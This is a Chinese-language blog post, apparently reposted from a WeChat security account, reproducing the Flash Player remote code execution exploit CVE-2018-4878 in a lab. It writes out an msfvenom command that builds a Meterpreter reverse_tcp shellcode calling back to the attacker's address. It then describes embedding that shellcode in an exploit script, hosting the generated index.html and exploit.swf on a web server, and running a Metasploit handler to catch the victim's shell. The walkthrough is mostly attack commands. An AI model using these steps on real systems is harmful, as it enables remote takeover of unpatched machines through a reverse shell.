Flash RCE 漏洞(CVE-2018-4878)复现

admin 2021年7月25日23:39:48评论143 views字数 975阅读3分15秒阅读模式

0x01 前言

该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。

0x02 环境

攻击机: kali 2018  (192.168.59.6)
靶机: Windows 10 x64   (192.168.59.160)
Web服务器: Windows 7 X64  (192.168.59.127)

0x03 复现过程


  1. 我们先在kali生成一个python类型的shellcode
    msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f python > /root/shellcode.txt

Flash RCE 漏洞(CVE-2018-4878)复现

  1. 替换EXP里面的shellcode
    Flash RCE 漏洞(CVE-2018-4878)复现

  2. 使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf
    Flash RCE 漏洞(CVE-2018-4878)复现
    Flash RCE 漏洞(CVE-2018-4878)复现

  3. 然后把这两个文件放到Web服务器里面
    Flash RCE 漏洞(CVE-2018-4878)复现

  4. 在kali的MSF里面设置监听

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.59.6
    msf exploit(handler) > set LPORT 6666
    msf exploit(handler) > exploit
  5. 然后使用靶机的win10 IE访问Web服务器的文件index.html
    Flash RCE 漏洞(CVE-2018-4878)复现

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的


本文始发于微信公众号(无害实验室sec):Flash RCE 漏洞(CVE-2018-4878)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日23:39:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Flash RCE 漏洞(CVE-2018-4878)复现https://cn-sec.com/archives/381452.html

发表评论

匿名网友 填写信息